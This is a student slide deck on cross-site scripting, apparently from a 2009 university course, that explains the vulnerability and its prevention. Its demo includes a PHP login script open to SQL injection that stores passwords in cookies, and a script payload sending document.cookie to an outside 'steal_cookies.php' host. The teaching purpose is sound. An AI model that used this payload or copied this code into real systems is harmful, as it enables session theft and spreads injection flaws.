Cross Site Scripting: Understanding and Preventing this Common Web Vulnerability, Study Guides, Projects, Research of Electrical and Electronics Engineering

Download Cross Site Scripting: Understanding and Preventing this Common Web Vulnerability and more Study Guides, Projects, Research Electrical and Electronics Engineering in PDF only on Docsity! XSS Group 13 Andrew Kozlik, Ada XSS - Overview  What is Cross Site Scripting?  Cross Site Scripting is a type of vulnerability found in web applications. When exploited, It allows an attacker to gain access to sensitive data.  This access is gained by code injection. Code injection is when code is introduced into a program or application to change it’s course of execution.  Note: Cross Site Scripting is sometimes abbreviated as CSS, This is not a good practice as it can lead to confusion with Cascading Style Sheets also CSS, a technology used to add style to HTML documents. Instead Cross Site Scripting should be abbreviated as XSS. XSS – Overview  According to the security software company Symantec, XSS has become the most common vulnerability on the web. In 2007 11,253 site-specific cross-site vulnerabilities were documented, compared to 2,134 "traditional" vulnerabilities.  Many prominent websites have been found to have XSS vulnerabilities, including Google, Facebook, and even FBI.gov. Once discovered they are usually patched fairly quickly. Prevention  All web servers, application servers, and web application environments are susceptible to cross site scripting.  Likely that at least 68% of websites are open to XSS attacks on their users.  Site administrators rarely fix XSS problems and, when they do, the average patch time is roughly 52 days.  So how can we prevent this? Prevention  The answer is in fact simple - never trust user input and always filter metacharacters.  The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output .  Some methods include escaping, filtering, input validation. Prevention – Input Validation  Input validation is a common theme in application development (even outside of web development) and is generally very useful.  For instance, if a form accepts some field, which is supposed to contain a phone number, a server-side routine could remove all characters other than digits, parentheses, and dashes, such that the result cannot contain a script.  Input validation may help to mitigate other injection attacks such as SQL injection. While effective for most types of input, there are times when an application must be able to accept special HTML characters, such as '<' and '>'. Demo <?php require("../includes/conn.php"); session_start(); $user = $_POST['username']; $pass = $_POST['password']; $sql = "select * from users where username = '$user' and password = '$pass'"; $result = mysql_query($sql); if ( mysql_num_rows($result) > 0) { setcookie("username", $user, time()+3600, "/"); setcookie("password", $pass, time()+3600, "/"); $_SESSION['logged'] = true; $_SESSION['username'] = $user; header("Location: ../comments.php"); exit; } else header("Location: ../index.php?error=1"); ?> Sample Login Script Note: We set two cookies holding the username and password Demo Malicious user inputs the following code into the comments field: <script> window.location = "http://www.codefortravel.com/steal_cookies.php?cookie=" + document.cookie; </script> Demo  All of this can be avoided using simple data sanitization techniques.  One such method is to convert HTML characters into their HTML entities. '<' would be converted to &lt; '>' would be converted to &gt; '&' would be converted to &amp;  PHP has a function specifically made for this purpose. That function is htmlentities(). Demo <?php session_start(); require("../includes/conn.php"); $comment = $_POST['comment']; $comment = htmlentities($comment); $sql = "insert into comments (date, author, comment) values ('" . date('m-d-Y h:i A') . "', '" . $_SESSION['username'] . "', '$comment')"; $result = mysql_query($sql); header("Location: ../comments.php"); exit; ?> This simple function is enough to prevent against many XSS attacks, but it isn't perfect XSS References  Demo created: http://ml.cecs.ucf.edu/andrew/xss/  XSS Archive. Retrieved February 22, 2009, from XSS information and vulnerable websites archive Web site: http://www.xssed.com/archive/special=1  Rafail, Jason (2001). Cross-Site Scripting Vulnerabilities. Retrieved February 22, 2009, from www.cert.org/archive/pdf/cross_site_scripting.pdf  Cross-site scripting. In Wikipedia [Web]. Wikimedia Foundation, Inc.. Retrieved February 22, 2009, from http://en.wikipedia.org/wiki/Cross- site_scripting  (April, 2008). Trends for July–December 07. Symantec Internet Security Threat Report, XIII, Retrieved February 22, 2009, from http://eval.symantec.com/mktginfo/enterprise/white_papers/b- whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en- us.pdf